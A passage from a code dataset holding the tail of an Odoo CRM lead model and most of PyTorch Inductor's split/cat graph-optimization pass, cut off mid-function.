user_id=fields.Many2one(comodel_name=\"res.users\",string=\"Salesperson\",required=True)\n lead_line_ids=fields.One2many(comodel_name=\"crm.lead.line.ept\",inverse_name=\"lead_id\",string=\"CRM Lead Line\")\n state=fields.Selection([('New','New'),('Qualified','Qualified'),('Proposition','Proposition'),('Won','Won'),('Lost','Lost')],string=\"State\",help=\"State of the CRM Lead\",default=\"New\")\n won_date=fields.Date(string=\"Won Date\")\n lost_reason=fields.Char(string=\"Lost Reason\",help=\"Reason of the lost\")\n next_followup_date=fields.Date(string=\"Next Followup Date\")\n partner_name=fields.Char(string=\"Name\",help=\"Name of the partner\")\n partner_email=fields.Char(string=\"Email\",help=\"Email of the partner\")\n partner_country_id = fields.Many2one(comodel_name=\"res.country.ept\", string=\"Country\", help=\"Country of the customer\")\n partner_state_id = fields.Many2one(comodel_name=\"res.state.ept\", string=\"State\", help=\"State of the country\")\n partner_city_id = fields.Many2one(comodel_name=\"res.city.ept\", string=\"City\",help=\"City of the state\")\n partner_phone_no=fields.Char(string=\"Phone\",help=\"Phone number of the partner\")\n\n @api.model\n def change_qualified_state(self):\n \"\"\"\n :Functionality: To change state based on button click\n :return: -\n \"\"\"\n self.write({'state' : 'Qualified'})\n\n @api.multi\n def change_proposition_state(self):\n self.write({'state': 'Proposition'})\n\n @api.multi\n def change_won_state(self):\n self.write({'state': 'Won','won_date':fields.Date.today()})\n\n\n @api.multi\n def change_lost_state(self):\n self.write({'state': 'Lost'})\n\n @api.multi\n def generate_sales_quotation(self):\n \"\"\"\n 
functionality:generate sales quotation in crm lead using traditional and triplet\n :return: -\n \"\"\"\n if not self.partner_id:\n raise Warning(\"Customer cannot be selected, First you have create the customer.\")\n else:\n # Traditional way\n order_lines=[]\n for line in self.lead_line_ids:\n order_lines.append((0,0,{'product_id':line.product_id.id,\n 'name':line.name,'quantity':line.expected_sell_qty,'uom_id':line.uom_id.id,\n 'unit_price':line.product_id.sale_price}))\n\n tmp_order=self.env['sale.order.ept'].new({'partner_id':self.partner_id.id})\n tmp_order.onchange_partner_id()\n order=self.env['sale.order.ept'].create({\n 'partner_id':self.partner_id.id,\n 'partner_invoice_id':tmp_order.partner_invoice_id.id,\n 'partner_shipping_id':tmp_order.partner_shipping_id.id,\n 'crm_lead_id':self.id,\n 'order_line_ids':order_lines\n })\n\n # for line in self.lead_line_ids:\n # self.env['sale.order.line.ept'].create({'order_id':order.id,'product_id':line.product_id.id,\n # 'name':line.name,'quantity':line.expected_sell_qty,'uom_id':line.uom_id.id,\n # 'unit_price':line.product_id.sale_price})\n\n\n @api.multi\n def create_partner(self):\n if not self.partner_id:\n partner=self.env['res.partner.ept'].create({'name':self.partner_name,'email':self.partner_email,\n 'phone':self.partner_phone_no,'city_id':self.partner_city_id.id,\n 'country_id':self.partner_country_id.id,'state_id':self.partner_state_id.id})\n\n self.write({'partner_id': partner.id})\n else:\n raise Warning(\"Customer already selected\")\n\n\n\n\n\n\n\n\n","repo_name":"sejalk-emipro/odoo_exercise_02","sub_path":"sale_ept/models/crm_lead_ept.py","file_name":"crm_lead_ept.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14825829399","text":"import itertools\nimport logging\nimport operator\nfrom typing import Any, Callable, List, Optional, Sequence, Set, Tuple, Union\n\nfrom typing_extensions import TypeAlias\n\nimport torch\nfrom torch._dynamo.utils import counters\n\nfrom ..pattern_matcher import (\n Arg,\n CallFunction,\n CallFunctionVarArgs,\n CallMethodVarArgs,\n config_flag,\n FailedMatch,\n get_arg_value,\n Ignored,\n KeywordArg,\n ListOf,\n Match,\n MatchContext,\n MULTIPLE,\n PatternExpr,\n register_graph_pattern,\n RepeatedExpr,\n)\nfrom .pre_grad import (\n merge_getitem_cat_pass,\n merge_splits_pass,\n normalization_pass,\n split_cat_pass,\n unbind_stack_pass,\n)\n\nlog = logging.getLogger(__name__)\n\n_Arguments: TypeAlias = Tuple[torch.fx.node.Argument, ...]\n_TransformParam: TypeAlias = Tuple[\n Optional[_Arguments],\n Optional[_Arguments],\n Optional[_Arguments],\n Optional[_Arguments],\n]\n_Range: TypeAlias = Tuple[int, int]\n\n\ndef _get_split_args_default(split_node):\n input_kwarg = \"tensor\"\n split_size_kwarg = \"split_size_or_sections\"\n dim_kwarg = \"dim\"\n default_dim_value = 0\n if split_node.op == \"call_method\":\n split_size_kwarg = \"split_size\"\n return (\n get_arg_value(split_node, 0, input_kwarg),\n get_arg_value(split_node, 1, split_size_kwarg),\n get_arg_value(split_node, 2, dim_kwarg) or default_dim_value,\n )\n\n\ndef normalize_split_base(\n match: Match,\n _get_split_args: Callable[\n [torch.fx.Node], Tuple[Optional[torch.fx.Node], Optional[Any], Optional[int]]\n ],\n):\n \"\"\"\n Normalize split with split_size into split_with_sizes, so that we only deal with one type of split in\n subsequent optimizations\n \"\"\"\n split_node = match.nodes[0]\n graph = match.graph\n split_input, 
split_size, split_dim = _get_split_args(split_node)\n if split_input is None or split_dim is None or split_size is None:\n log.info(\"couldn't find split args\")\n return\n if \"example_value\" not in split_node.meta:\n log.warning(\"example value absent for node: %s\", split_node)\n return\n assert isinstance(split_node.meta[\"example_value\"], (list, tuple))\n split_sections = [t.size()[split_dim] for t in split_node.meta[\"example_value\"]]\n\n if any(isinstance(section, torch.SymInt) for section in split_sections):\n # TODO dynamic_shapes with assume_static_by_default=False fails while AOT Autograd tracing.\n return\n if split_dim < 0: # Normalize split dim\n split_dim += split_input.meta[\"example_value\"].dim()\n with graph.inserting_after(split_node):\n new_split_node = graph.call_function(\n torch.split,\n args=(split_input, split_sections),\n kwargs={\"dim\": split_dim},\n )\n split_node.replace_all_uses_with(new_split_node)\n new_split_node.meta.update(split_node.meta)\n graph.erase_node(split_node)\n counters[\"inductor\"][\"split_cat_norm\"] += 1\n\n\n@register_graph_pattern(\n CallFunctionVarArgs(torch.split, users=MULTIPLE),\n pass_dict=normalization_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n CallMethodVarArgs(\"split\", users=MULTIPLE),\n pass_dict=normalization_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef normalize_split_default(match: Match, *args, **kwargs):\n return normalize_split_base(match, _get_split_args_default)\n\n\n@register_graph_pattern(\n CallFunctionVarArgs(torch.cat, users=MULTIPLE),\n pass_dict=normalization_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef normalize_cat_default(match: Match, *args, **kwargs):\n cat_node = match.nodes[0]\n graph = match.graph\n tensors = get_arg_value(cat_node, 0, \"tensors\")\n cat_dim = get_arg_value(cat_node, 1, \"dim\")\n if cat_dim is None:\n cat_axis = cat_node.kwargs.get(\"axis\")\n if cat_axis is not None:\n cat_dim = cat_axis\n else:\n cat_dim = 0\n if tensors is None or cat_dim is None:\n log.info(\"couldn't find cat args\")\n return\n assert isinstance(tensors, (list, tuple))\n for tensor in itertools.chain([cat_node], tensors):\n if \"example_value\" not in tensor.meta:\n log.warning(\"example value absent for node: %s\", tensor)\n return\n\n ndim = cat_node.meta[\"example_value\"].dim()\n\n def is_empty_tensor(x):\n # special case where torch.cat supports cat'ing with an empty tensor\n x_shape = x.meta[\"example_value\"].shape\n return len(x_shape) == 1 and x_shape[0] == 0\n\n assert all(\n ndim == x.meta[\"example_value\"].dim() or is_empty_tensor(x) for x in tensors\n )\n\n if cat_dim < 0: # Normalize cat dim\n cat_dim += ndim\n\n with graph.inserting_after(cat_node):\n new_cat_node = graph.call_function(\n torch.cat,\n args=(tensors,),\n kwargs={\"dim\": cat_dim},\n )\n cat_node.replace_all_uses_with(new_cat_node)\n new_cat_node.meta.update(cat_node.meta)\n graph.erase_node(cat_node)\n counters[\"inductor\"][\"split_cat_norm\"] += 1\n\n\n@register_graph_pattern(\n CallFunctionVarArgs(torch.stack, users=MULTIPLE),\n pass_dict=normalization_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef normalize_stack_default(match: Match, *args, **kwargs):\n node = match.nodes[0]\n graph = match.graph\n tensors = get_arg_value(node, 0, \"tensors\")\n dim = get_arg_value(node, 1, \"dim\") or 0\n if tensors is None or dim is None:\n log.info(\"couldn't find stack args\")\n return\n assert isinstance(tensors, (list, tuple))\n\n 
# A bug in pytorch, some nodes miss the example_value metadata\n for tensor in itertools.chain([node], tensors):\n if \"example_value\" not in tensor.meta:\n log.warning(\"example value absent for node: %s\", tensor)\n return\n\n ndim = node.meta[\"example_value\"].dim()\n if dim < 0: # Normalize dim\n dim += ndim\n\n with graph.inserting_after(node):\n new_node = graph.call_function(\n node.target,\n args=(tensors,),\n kwargs={\"dim\": dim},\n )\n node.replace_all_uses_with(new_node)\n new_node.meta.update(node.meta)\n graph.erase_node(node)\n counters[\"inductor\"][\"split_cat_norm\"] += 1\n\n\ndef find_next_users(split_node: torch.fx.Node) -> List[torch.fx.Node]:\n next_users = []\n for getitem_node in split_node.users.keys():\n for getitem_user in getitem_node.users.keys():\n if getitem_user not in next_users:\n next_users.append(getitem_user)\n return next_users\n\n\n@register_graph_pattern(\n CallMethodVarArgs(\"squeeze\", users=MULTIPLE),\n pass_dict=normalization_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef normalize_squeeze_default(match: Match, *args, **kwargs):\n squeeze_node = match.nodes[0]\n squeeze_input = get_arg_value(squeeze_node, 0)\n\n if \"dim\" in squeeze_node.kwargs:\n assert len(squeeze_node.args) == 1\n dim = squeeze_node.kwargs[\"dim\"]\n elif len(squeeze_node.args) == 1:\n # squeeze(Tensor)\n dim = None\n elif len(squeeze_node.args) == 2:\n # squeeze(Tensor self, int dim)\n # squeeze(Tensor self, int[] dim)\n dim = squeeze_node.args[1]\n else:\n # squeeze(Tensor self, int[] dim) (called with varargs)\n dim = squeeze_node.args[1:]\n\n if isinstance(dim, Sequence) and len(dim) == 1:\n dim = dim[0]\n\n with match.graph.inserting_after(squeeze_node):\n if dim is None:\n new_squeeze_node = match.graph.call_function(\n torch.squeeze, args=(squeeze_input,)\n )\n else:\n new_squeeze_node = match.graph.call_function(\n torch.squeeze, args=(squeeze_input, dim)\n )\n squeeze_node.replace_all_uses_with(new_squeeze_node)\n match.graph.erase_node(squeeze_node)\n\n\nclass TorchSplit(CallFunction):\n \"\"\"\n Matches a call to torch.split if it is in a normalized form. Ensures that all users of\n splits are unique getitems.\n \"\"\"\n\n def __init__(self, arg, sizes):\n # using KeywordArg(\"dim\") for `dim` checks they all match\n super().__init__(\n torch.split, arg, sizes, _users=MULTIPLE, dim=KeywordArg(\"dim\")\n )\n\n def _match(self, node: torch.fx.Node, ctx: MatchContext):\n m = super()._match(node, ctx)\n if not m:\n return m\n split_sections = node.args[1]\n if not isinstance(split_sections, (list, tuple)):\n return FailedMatch(\"split not normalized\")\n # check users are all unique getitems\n seen_idxs = set()\n for user in node.users:\n if not CallFunction(operator.getitem, Arg(), Arg()).match(user):\n # This should ideally never happen. 
Split user should always be a getitem\n return FailedMatch(f\"user of split not a getitem: {user}\")\n if not isinstance(user.args[1], int):\n return FailedMatch(\"only integer getitems are handled\")\n if user.args[1] in seen_idxs:\n return FailedMatch(f\"duplicate getitem {user.args[1]}\")\n if user.args[-1] < 0:\n # This shouldn't ideally happen as dynamo normalizes indexes to positive\n return FailedMatch(\"negative index\")\n seen_idxs.add(user.args[1])\n return m\n\n\n@register_graph_pattern(\n TorchSplit(\n CallFunction(\n operator.getitem,\n TorchSplit(\n KeywordArg(\"first_split_input\"),\n KeywordArg(\"first_split_sections\"),\n ),\n Ignored(),\n ),\n KeywordArg(\"next_split_sections\"),\n ),\n pass_dict=merge_splits_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef merge_splits(\n match: Match,\n first_split_input: torch.fx.Node,\n first_split_sections: List[int],\n next_split_sections: List[int],\n # Note: dim is implicitly passed by TorchSplit, as it internally uses a pattern with dim\n dim: int,\n):\n node = match.output_node()\n graph = match.graph\n first_split = node.args[0].args[0]\n next_split_index = node.args[0].args[1]\n\n new_split_sections = list(first_split_sections)\n new_split_sections[next_split_index : next_split_index + 1] = next_split_sections\n\n first_split_dim = first_split.kwargs[\"dim\"]\n\n to_remove = []\n\n with graph.inserting_before(first_split):\n # Add the new split node\n new_split = graph.call_function(\n torch.split,\n args=(first_split_input, new_split_sections),\n kwargs={\"dim\": first_split_dim},\n )\n first_split_num_to_user = {\n user.args[1]: user for user in first_split.users.keys()\n }\n\n new_split_num = 0\n for split_num in range(len(first_split_sections)):\n if split_num not in first_split_num_to_user:\n new_split_num += 1\n continue\n old_getitem = first_split_num_to_user[split_num]\n if split_num != next_split_index:\n old_getitem.update_arg(0, new_split)\n old_getitem.update_arg(1, new_split_num)\n new_split_num += 1\n else:\n next_split_num_to_user = {\n user.args[1]: user for user in node.users.keys()\n }\n for next_split_num in range(len(next_split_sections)):\n with graph.inserting_after(new_split):\n new_getitem = graph.call_function(\n operator.getitem, args=(new_split, new_split_num)\n )\n new_split_num += 1\n next_getitem = next_split_num_to_user[next_split_num]\n new_getitem.meta.update(next_getitem.meta)\n next_getitem.replace_all_uses_with(new_getitem)\n to_remove.append(next_getitem)\n to_remove.append(node)\n to_remove.append(old_getitem)\n\n to_remove.append(first_split)\n for node in to_remove:\n graph.erase_node(node)\n\n counters[\"inductor\"][\"consecutive_split_merged\"] += 1\n\n\nclass SplitCatSimplifier:\n \"\"\"\n Helper class to simplify split-cat pattern. In simple cases, both split and cat node can be removed in a \"split->cat\"\n pattern. However, there are various cases where they can't and we need to simplify split/ add transforms before cat.\n Some such cases are:\n 1. Final node has additional args (not coming from the initial split)\n 2. Shuffling of args between split/cat\n 3. Some final nodes are non-(cat/stack)\n 4. Split-dim != cat-dim (but equal split)\n\n Note that any combination of the above cases can happen.\n\n To deal with 1, 2, & 3 - we iterate over all users of split. And figure out common \"ranges\" that can be merged.\n Then, we simplify the split accordingly. 
In the best case, split can be entirely removed.\n\n To deal with 4, we add some transformations (unflatten + movedim) (See `get_transform_params`).\n\n Finally, depending on final node being cat or stack, unsqueeze/flatten needs to be added.\n\n \"\"\"\n\n def simplify(\n self,\n graph: torch.fx.Graph,\n split_node: torch.fx.Node,\n split_sections: List[int],\n ):\n # Find the next users (i.e. users after the getitem)\n next_users = find_next_users(split_node)\n # Gather inputs of the next users. When inputs come from `split_node`, they are instead represented by\n # a tuple indicating the split ranges. See `get_user_input_list` for more details\n user_inputs_list = self.get_user_input_list(split_node, next_users)\n # Simplify the split_sections based on user_inputs_list. In simpler cases, len(simplified_split_ranges) == 1 and\n # we can simply replace the split node. Otherwise, we simplify it.\n simplified_split_ranges = self.get_simplified_split_ranges(\n split_sections, next_users, user_inputs_list\n )\n if not simplified_split_ranges: # Simplification not possible\n return\n transform_params_list = self.get_transform_params(\n split_node, next_users, user_inputs_list\n )\n if not transform_params_list:\n return\n\n # Start actual replacement\n user_inputs_list_new = self.replace_split(\n graph, split_node, split_sections, user_inputs_list, simplified_split_ranges\n )\n self.replace_cat(\n graph, split_node, next_users, user_inputs_list_new, transform_params_list\n )\n self.erase_old_nodes(graph, split_node, next_users)\n\n def get_user_input_list(\n self, split_node: torch.fx.Node, next_users: List[torch.fx.Node]\n ) -> List[List[Union[torch.fx.Node, _Range]]]:\n \"\"\"\n Returns list of inputs to the following user nodes, in order. The outer list represents the user node. The inner\n list represents the inputs to that particular node. 
This list can either contain\n - a tuple representing the ranges of get_items that should go into the cat (closed interval)\n - torch.fx.Node representing \"other\" inputs (which are not coming from our split)\n \"\"\"\n user_inputs_list: List[List[Union[torch.fx.Node, _Range]]] = []\n for user in next_users:\n if user.target in {torch.cat, torch.stack}:\n user_inputs_list.append(self.get_merged_user_inputs(split_node, user))\n else:\n user_inputs_list.append(self.get_non_cat_node_input(split_node, user))\n return user_inputs_list\n\n def get_merged_user_inputs(\n self, split_node: torch.fx.Node, cat_node: torch.fx.Node\n ) -> List[Union[torch.fx.Node, _Range]]:\n user_inputs = get_arg_value(cat_node, 0, \"tensors\")\n simplified_user_inputs = []\n split_users = set(split_node.users.keys())\n for user_input in user_inputs:\n if user_input not in split_users:\n simplified_user_inputs.append(user_input)\n else:\n # Add which \"getitem\" cat depends on\n simplified_user_inputs.append(user_input.args[1])\n return self.merge_consecutive_inputs(simplified_user_inputs)\n\n def get_non_cat_node_input(\n self, split_node: torch.fx.Node, node: torch.fx.Node\n ) -> List[_Range]:\n \"\"\"\n Get input for a non cat node in the same format as `get_merged_user_inputs`\n \"\"\"\n node_input = []\n split_users = set(split_node.users.keys())\n for node_arg in node.all_input_nodes:\n if node_arg in split_users:\n getitem_num = get_arg_value(node_arg, 1)\n node_input.append((getitem_num, getitem_num))\n return node_input\n\n def merge_consecutive_inputs(\n self, inputs: List[Union[torch.fx.Node, int]]\n ) -> List[Union[torch.fx.Node, _Range]]:\n \"\"\"\n Merge consecutive inputs going into a user node.\n\n For e.g.\n [arg0, 0, 1, 2, arg1] -> [arg0, (0, 2), arg1]\n \"\"\"\n merged_ranges = []\n cur_range = None\n for input_ in inputs:\n if isinstance(input_, int):\n if not cur_range:\n cur_range = [input_, input_]\n elif input_ == cur_range[1] + 1:\n cur_range[1] += 1\n else:\n merged_ranges.append(tuple(cur_range))\n cur_range = [input_, input_]\n else:\n if cur_range:\n merged_ranges.append(tuple(cur_range))\n cur_range = None\n merged_ranges.append(input_)\n if cur_range:\n merged_ranges.append(tuple(cur_range))\n return merged_ranges\n\n def get_simplified_split_ranges(\n self,\n split_sections,\n next_users,\n user_inputs_list: List[List[Union[torch.fx.Node, _Range]]],\n ) -> Optional[List[_Range]]:\n ranges = set()\n for user_node, user_inputs in zip(next_users, user_inputs_list):\n ranges |= {\n user_input\n for user_input in user_inputs\n if isinstance(user_input, tuple)\n }\n cumulative_sizes = [0] + torch.cumsum(torch.tensor(split_sections), 0).tolist()\n split_ranges = sorted(\n [(cumulative_sizes[r[0]], cumulative_sizes[r[1] + 1]) for r in ranges]\n )\n\n if not self.has_non_overlapping_ranges(\n split_ranges,\n ): # This need not be a strict condition\n # However, we keep it now for simplicity.\n return None\n split_ranges = self.fill_gaps(split_ranges, 0, cumulative_sizes[-1])\n if len(split_sections) == len(split_ranges): # Simplification not possible\n return None\n counters[\"inductor\"][\"scmerge_split_sections_removed\"] = len(\n split_sections\n ) - len(split_ranges)\n return split_ranges\n\n def has_non_overlapping_ranges(self, ranges: List[_Range]) -> bool:\n for range_, next_range in zip(ranges, ranges[1:]):\n if range_[1] > next_range[0]:\n return False\n return True\n\n def fill_gaps(self, ranges: List[_Range], min_: int, max_: int) -> List[_Range]:\n cur = min_\n filled_ranges = []\n 
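# [Editorial worked example, hedged; values are illustrative only]\n        # With ranges=[(2, 5), (7, 8)], min_=0, max_=10 the loop below yields:\n        #   (2, 5): cur=0 < 2 -> append gap (0, 2), then (2, 5); cur=5\n        #   (7, 8): cur=5 < 7 -> append gap (5, 7), then (7, 8); cur=8\n        # and the final check appends the trailing gap (8, 10), giving\n        #   [(0, 2), (2, 5), (5, 7), (7, 8), (8, 10)]\n        # i.e. a full partition of [min_, max_) with the original ranges kept.\n        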
for a, b in ranges:\n if cur < a:\n filled_ranges.append((cur, a))\n filled_ranges.append((a, b))\n cur = b\n if filled_ranges[-1][1] < max_:\n filled_ranges.append((filled_ranges[-1][1], max_))\n return filled_ranges\n\n def get_transform_params(\n self,\n split_node: torch.fx.Node,\n next_users: List[torch.fx.Node],\n user_inputs_list: List[List[Union[torch.fx.Node, _Range]]],\n ) -> Optional[List[List[_TransformParam]]]:\n \"\"\"\n Figure out what transforms are needed for each input to each cat node.\n\n We replace a split node with an unflatten followed by a movedim\n \"\"\"\n split_dim = split_node.kwargs[\"dim\"]\n split_sections = split_node.args[1]\n transform_params_list: List[List[_TransformParam]] = []\n\n for user_node, user_inputs in zip(next_users, user_inputs_list):\n if user_node.target not in {torch.cat, torch.stack}:\n transform_params_list.append([])\n continue\n\n cat_dim = get_arg_value(user_node, 1, \"dim\")\n transform_params: List[_TransformParam] = []\n for user_input in user_inputs:\n if split_dim == cat_dim and user_node.target == torch.cat:\n # No transform needed\n transform_params.append((None, None, None, None))\n elif isinstance(user_input, tuple): # Split being simplified\n # Verify equal split\n subset_split_sections = split_sections[\n user_input[0] : user_input[1] + 1\n ]\n # All sections should be equal\n if len(set(subset_split_sections)) != 1:\n return None\n\n num_splits = len(subset_split_sections)\n unflatten_params = (split_dim, (num_splits, -1))\n movedim_params = (\n (split_dim, cat_dim) if split_dim != cat_dim else None\n )\n transform_params.append(\n (unflatten_params, movedim_params, None, None)\n )\n elif (\n user_node.target == torch.stack or split_dim != cat_dim\n ): # We need to unsqueeze inputs not coming through split\n transform_params.append((None, None, (cat_dim,), None))\n else: # Non-split inputs\n transform_params.append((None, None, None, None))\n transform_params_list.append(transform_params)\n return transform_params_list\n\n def replace_split(\n self,\n graph: torch.fx.Graph,\n split_node: torch.fx.Node,\n split_sections: List[int],\n user_inputs_list: List[List[Union[torch.fx.Node, _Range]]],\n split_ranges: List[_Range],\n ) -> List[List[torch.fx.Node]]:\n \"\"\"\n Replace the split node. 
It can either remove the split node if len(split_ranges) == 1, or simplify it\n into a split with lesser sections if len(split_ranges) > 1.\n\n Returns the new `user_inputs_list`, with tuples replaced with new getitems from the newer split node.\n \"\"\"\n split_input = split_node.args[0]\n split_dim = split_node.kwargs[\"dim\"]\n if len(split_ranges) == 1: # We can completely eliminate the split node\n split_items = [split_input]\n else:\n with graph.inserting_after(split_node):\n new_split = graph.call_function(\n torch.split,\n args=(\n split_input,\n [r[1] - r[0] for r in split_ranges],\n split_dim,\n ),\n )\n new_split.meta.update(split_node.meta)\n counters[\"inductor\"][\"scmerge_split_added\"] += 1\n with graph.inserting_after(new_split):\n split_items = [\n graph.call_function(operator.getitem, args=(new_split, i))\n for i in range(len(split_ranges))\n ]\n # Now assign the right getitem to the right input\n cumulative_sizes = [0] + torch.cumsum(torch.tensor(split_sections), 0).tolist()\n new_user_inputs_list = []\n for user_inputs in user_inputs_list:\n new_user_inputs = []\n for user_input in user_inputs:\n if isinstance(user_input, tuple):\n # Find the correct new getitem (present in split_items)\n new_user_inputs.append(\n split_items[\n split_ranges.index(\n (\n cumulative_sizes[user_input[0]],\n cumulative_sizes[user_input[1] + 1],\n )\n )\n ]\n )\n else:\n new_user_inputs.append(user_input)\n new_user_inputs_list.append(new_user_inputs)\n return new_user_inputs_list\n\n def replace_cat(\n self,\n graph: torch.fx.GraphModule,\n split_node: torch.fx.Node,\n next_users: List[torch.fx.Node],\n user_inputs_list_new,\n transform_params_list: List[List[_TransformParam]],\n ):\n split_dim = split_node.kwargs[\"dim\"]\n\n split_users = split_node.users.keys()\n new_cats = []\n for user_node, user_inputs_new, transform_params in zip(\n next_users, user_inputs_list_new, transform_params_list\n ):\n if user_node.target not in {torch.cat, torch.stack}:\n # Change the args and kwargs of non-cat/stack nodes. 
Replace old getitems (belonging to\n # the original split node) with the newer getitems\n next_cat_input = 0\n for input_node in user_node.all_input_nodes:\n if input_node in split_users:\n user_node.replace_input_with(\n input_node, user_inputs_new[next_cat_input]\n )\n next_cat_input += 1\n continue\n\n # Handle cat/stack user nodes\n cat_dim = get_arg_value(user_node, 1, \"dim\")\n user_inputs_new_transformed = []\n # For `unsqueeze` transform, we will combine consecutive inputs with the same unsqueeze params, and stack them\n to_stack = []\n stack_dim = None\n with graph.inserting_before(user_node):\n for user_input_new, transform_param in zip(\n user_inputs_new, transform_params\n ):\n # Apply transforms\n (\n unflatten_params,\n movedim_params,\n unsqueeze_params,\n flatten_params,\n ) = transform_param\n if unsqueeze_params and (\n stack_dim is None or stack_dim == unsqueeze_params[0]\n ):\n to_stack.append(user_input_new)\n stack_dim = unsqueeze_params[0]\n continue\n elif to_stack:\n stacked_input = graph.call_function(\n torch.stack, args=(to_stack, stack_dim)\n )\n to_stack = []\n stack_dim = None\n user_inputs_new_transformed.append(stacked_input)\n if unsqueeze_params:\n to_stack.append(user_input_new)\n stack_dim = unsqueeze_params[0]\n continue\n\n if unflatten_params:\n user_input_new = graph.call_function(\n torch.unflatten, args=(user_input_new, *unflatten_params)\n )\n if movedim_params:\n user_input_new = graph.call_function(\n torch.movedim, args=(user_input_new, *movedim_params)\n )\n if flatten_params:\n user_input_new = graph.call_function(\n torch.flatten, args=(user_input_new, *flatten_params)\n )\n user_inputs_new_transformed.append(user_input_new)\n if to_stack:\n stacked_input = graph.call_function(\n torch.stack, args=(to_stack, stack_dim)\n )\n user_inputs_new_transformed.append(stacked_input)\n\n with graph.inserting_after(user_node):\n if len(user_inputs_new_transformed) > 1:\n new_cat_node = graph.call_function(\n torch.cat, args=(user_inputs_new_transformed, cat_dim)\n )\n new_cat_node.meta.update(user_node.meta)\n counters[\"inductor\"][\"scmerge_cat_added\"] += 1\n else:\n new_cat_node = user_inputs_new_transformed[-1]\n\n if (\n user_node.target == torch.cat\n and split_dim != cat_dim\n and split_node.target == torch.split\n ):\n with graph.inserting_after(new_cat_node):\n new_cat_node = graph.call_function(\n torch.flatten, args=(new_cat_node, cat_dim, cat_dim + 1)\n )\n user_node.replace_all_uses_with(new_cat_node)\n new_cats.append(new_cat_node)\n\n def erase_old_nodes(\n self,\n graph: torch.fx.GraphModule,\n split_node: torch.fx.Node,\n next_users: List[torch.fx.Node],\n ):\n to_remove = [split_node]\n counters[\"inductor\"][\"scmerge_split_removed\"] += 1\n for getitem_node in split_node.users.keys():\n to_remove.append(getitem_node)\n for next_user in next_users:\n if next_user.target not in {torch.cat, torch.stack}:\n continue\n counters[\"inductor\"][\"scmerge_cat_removed\"] += 1\n to_remove.append(next_user)\n for node in reversed(to_remove):\n graph.erase_node(node)\n\n\nclass UnbindCatRemover(SplitCatSimplifier):\n \"\"\"\n Helper class to merge Unbind->Cat/Stack. Many of the cases are similar to SplitCatSimplifier.\n\n Unbind can't be simplified like splits. So, we can only remove the unbind node. 
Other than this,\n other cases like multiple users, additional args, dim mismatch are similar to `SplitCatSimplifier`,\n hence we extend that class.\n \"\"\"\n\n def remove_unbind(\n self,\n graph: torch.fx.Graph,\n unbind_node: torch.fx.Node,\n ):\n num_unbind = (\n max(getitem_node.args[1] for getitem_node in unbind_node.users.keys()) + 1\n )\n split_sections = [1 for _ in range(num_unbind)]\n\n super().simplify(graph, unbind_node, split_sections)\n\n def get_simplified_split_ranges(\n self,\n split_sections: List[int],\n next_users: List[torch.fx.Node],\n user_inputs_list: List[List[Union[torch.fx.Node, _Range]]],\n ) -> Optional[List[_Range]]:\n simplified_split_ranges = super().get_simplified_split_ranges(\n split_sections, next_users, user_inputs_list\n )\n if not simplified_split_ranges or len(simplified_split_ranges) != 1:\n return None\n return simplified_split_ranges\n\n def get_transform_params(\n self,\n unbind_node: torch.fx.Node,\n next_users: List[torch.fx.Node],\n user_inputs_list: List[List[Union[torch.fx.Node, _Range]]],\n ) -> Optional[List[List[_TransformParam]]]:\n \"\"\"\n Figure out what transforms are needed for each input to each cat node.\n\n Here is the rough transforms we apply:\n\n x -> unbind -> stack => x -> movedim\n\n x -> unbind -> cat => x -> movedim -> flatten\n\n When cat/stack nodes have additional args:\n\n addn ---| addn -> unsqueeze ---|\n x -> unbind -> stack => x -> movedim -> cat\n\n addn ---| addn ---|\n x -> unbind -> cat => x -> movedim -> flatten -> cat\n\n (Note application of these depends on the dims as well)\n\n\n \"\"\"\n split_dim = unbind_node.kwargs[\"dim\"]\n transform_params_list: List[List[_TransformParam]] = []\n for user_node, user_inputs in zip(next_users, user_inputs_list):\n cat_dim = get_arg_value(user_node, 1, \"dim\") or 0\n transform_params: List[_TransformParam] = []\n for user_input in user_inputs:\n if isinstance(user_input, tuple):\n # User input is coming from unbind\n movedim_params = (\n (split_dim, cat_dim) if split_dim != cat_dim else None\n )\n flatten_params = None\n if user_node.target == torch.cat:\n flatten_params = (cat_dim, cat_dim + 1)\n transform_params.append(\n (None, movedim_params, None, flatten_params)\n )\n elif (\n user_node.target == torch.stack\n ): # We need to unsqueeze inputs not coming through unbind into cat\n transform_params.append((None, None, (cat_dim,), None))\n else: # Non-unbind inputs\n transform_params.append((None, None, None, None))\n transform_params_list.append(transform_params)\n return transform_params_list\n\n\nclass GetItem(CallFunction):\n def __init__(self, arg, index, _users=1):\n super().__init__(operator.getitem, arg, index, _users=_users)\n\n def find_anchor_nodes(self, ctx: MatchContext, searched: Set[torch.fx.Node]):\n # We generally match GetItem with arg being an Arg(). So, we never return the anchor\n # nodes as the stored node in ctx.pattern_to_node is returned. 
Here we override find_anchor_nodes\n # to not use ctx.pattern_to_node\n for pattern in self.flat_args_kwargs[0]:\n if isinstance(pattern, PatternExpr):\n for other_node in pattern.find_anchor_nodes(ctx, searched):\n if not isinstance(other_node, torch.fx.Node):\n continue\n for node in other_node.users:\n if node not in searched:\n if self._match_fns(node):\n yield node\n searched.add(node)\n\n\n@register_graph_pattern(\n RepeatedExpr(\n CallFunction(\n torch.squeeze,\n GetItem(\n TorchSplit(\n KeywordArg(\"split_input\"),\n KeywordArg(\"split_sizes\"),\n ),\n Ignored(),\n ),\n KeywordArg(\"dim\"),\n _users=MULTIPLE,\n ),\n ),\n pass_dict=split_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n RepeatedExpr(\n CallFunction(\n torch.squeeze,\n GetItem(\n TorchSplit(\n KeywordArg(\"split_input\"),\n KeywordArg(\"split_sizes\"),\n ),\n Ignored(),\n ),\n dim=KeywordArg(\"dim\"),\n _users=MULTIPLE,\n )\n ),\n pass_dict=split_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef merge_split_squeeze(\n match: Match, split_input: torch.fx.Node, split_sizes: 